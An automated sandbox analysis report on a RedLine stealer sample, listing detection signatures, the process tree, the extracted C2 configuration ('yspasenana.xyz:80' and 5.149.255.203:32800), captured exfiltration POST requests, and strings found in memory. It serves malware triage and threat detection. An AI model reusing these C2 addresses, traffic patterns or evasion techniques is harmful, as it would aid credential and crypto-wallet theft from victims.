
Windows Analysis Report Nb2HQZZDIf

Overview

General Information

Sample Name: Nb2HQZZDIf (renamed file extension from none to exe)
Analysis ID: 452456
MD5: b8371590264db62ecbba4b7f481a21a8
SHA1: 837bfd10d70113330b2e00a1f12e99c4b0065d38
SHA256: fa3e22734ccb01da24364b65793ca5d2fafc53fbe6cef3eab8d76b158d1e0d7a
Tags: exe, trojan

Most interesting Screenshot:

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large strings
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
May check the online IP address of the machine
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to a URL shortener service
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Nb2HQZZDIf.exe (PID: 5924 cmdline: 'C:\Users\user\Desktop\Nb2HQZZDIf.exe' MD5: B8371590264DB62ECBBA4B7F481A21A8)
    • 1234.exe (PID: 4628 cmdline: C:\Users\user\AppData\Roaming\1234.exe 1234 MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
      • 1234.exe (PID: 808 cmdline: {path} MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
      • 1234.exe (PID: 2524 cmdline: {path} MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
        • srvs.exe (PID: 5088 cmdline: 'C:\Users\user\AppData\Local\Temp\srvs.exe' MD5: D11C21AB3E969F79E3C783FDD97E1C10)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}

Yara Overview

PCAP (Network Traffic)

Source: dump.pcap | Rule: JoeSecurity_RedLine_1 | Description: Yara detected RedLine Stealer | Author: Joe Security

Memory Dumps

Source: 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 00000015.00000003.382545912.0000000000D10000.00000004.00000001.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmp | Rule: JoeSecurity_AntiVM_3 | Description: Yara detected AntiVM_3 | Author: Joe Security
Source: 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmp | Rule: JoeSecurity_RedLine_1 | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 00000002.00000002.306824778.00000000042C0000.00000004.00000001.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
(5 of 8 entries shown)

Unpacked PEs

Source: 2.2.1234.exe.43e5a60.3.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 15.2.1234.exe.400000.0.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 2.2.1234.exe.43e5a60.3.raw.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 21.2.srvs.exe.df0000.0.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 2.2.1234.exe.43e5a60.3.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Metadefender: Detection: 17%
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\1234.exe | ReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: Nb2HQZZDIf.exe | Virustotal: Detection: 22%
Source: Nb2HQZZDIf.exe | ReversingLabs: Detection: 25%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.25.233.53:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.216.94.27:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.217.80.20:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: srvs.exe, 00000015.00000002.480413638.0000000001182000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C2390 FindFirstFileW,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D792 FindFirstFileW,GetLastError,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,

Networking:

May check the online IP address of the machine
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | DNS query: name: iplogger.org
Performs DNS queries to domains with low reputation
Source: C:\Users\user\AppData\Roaming\1234.exe | DNS query: yspasenana.xyz (reported 4 times)
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 32800
Source: unknown | Network traffic detected: HTTP traffic on port 32800 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 32800 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 32800
Source: unknown | Network traffic detected: HTTP traffic on port 32800 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 32800 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 32800
Source: unknown | Network traffic detected: HTTP traffic on port 32800 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 32800 -> 49754
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | DNS query: name: is.gd
Source: global traffic | TCP traffic: 192.168.2.3:49751 -> 5.149.255.203:32800
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: yspasenana.xyz Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: yspasenana.xyz Content-Length: 1151249 Expect: 100-continue Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: yspasenana.xyz Content-Length: 1151241 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate" Host: yspasenana.xyz Content-Length: 1151267 Expect: 100-continue Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 5.149.255.203:32800 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 5.149.255.203:32800 Content-Length: 1151929 Expect: 100-continue Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 5.149.255.203:32800 Content-Length: 1151921 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.25.233.53
Source: Joe Sandbox View | IP Address: 104.192.141.1
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 5.149.255.203 (reported 50 times)
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely 
different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: iplogger.org
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: yspasenana.xyz Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Source: srvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmp | String found in binary or memory: http://5.149.255.203:3
Source: srvs.exe, 00000015.00000002.484570685.0000000003975000.00000004.00000001.sdmp | String found in binary or memory: http://5.149.255.203:32800
Source: srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmp | String found in binary or memory: http://5.149.255.203:32800/
Source: srvs.exe, 00000015.00000002.484570685.0000000003975000.00000004.00000001.sdmp | String found in binary or memory: http://5.149.255.203:328004
Source: Nb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmp | String found in binary or memory: http://ahkscript.org
Source: Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmp | String found in binary or memory: http://ahkscript.orgCould
Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://bitbucket.org
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.385284106.0000000002B0B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Nb2HQZZDIf.exe | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, Nb2HQZZDIf.exe | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.385284106.0000000002B0B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: 1234.exe, 0000000F.00000002.385284106.0000000002B0B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCert
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: Nb2HQZZDIf.exe | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: Nb2HQZZDIf.exe, 00000000.00000002.306921781.0000000000968000.00000004.00000020.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, Nb2HQZZDIf.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: 1234.exe, 0000000F.00000003.359594805.0000000008A81000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000003.382117254.0000000008A92000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                      Source: 1234.exe, 0000000F.00000003.359594805.0000000008A81000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000003.382117254.0000000008A92000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                      Source: 1234.exe, 0000000F.00000003.359594805.0000000008A81000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000003.382117254.0000000008A92000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.385284106.0000000002B0B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
                      Source: Nb2HQZZDIf.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                      Source: 1234.exe, 0000000F.00000002.385785787.0000000002B7B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484424033.00000000038B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
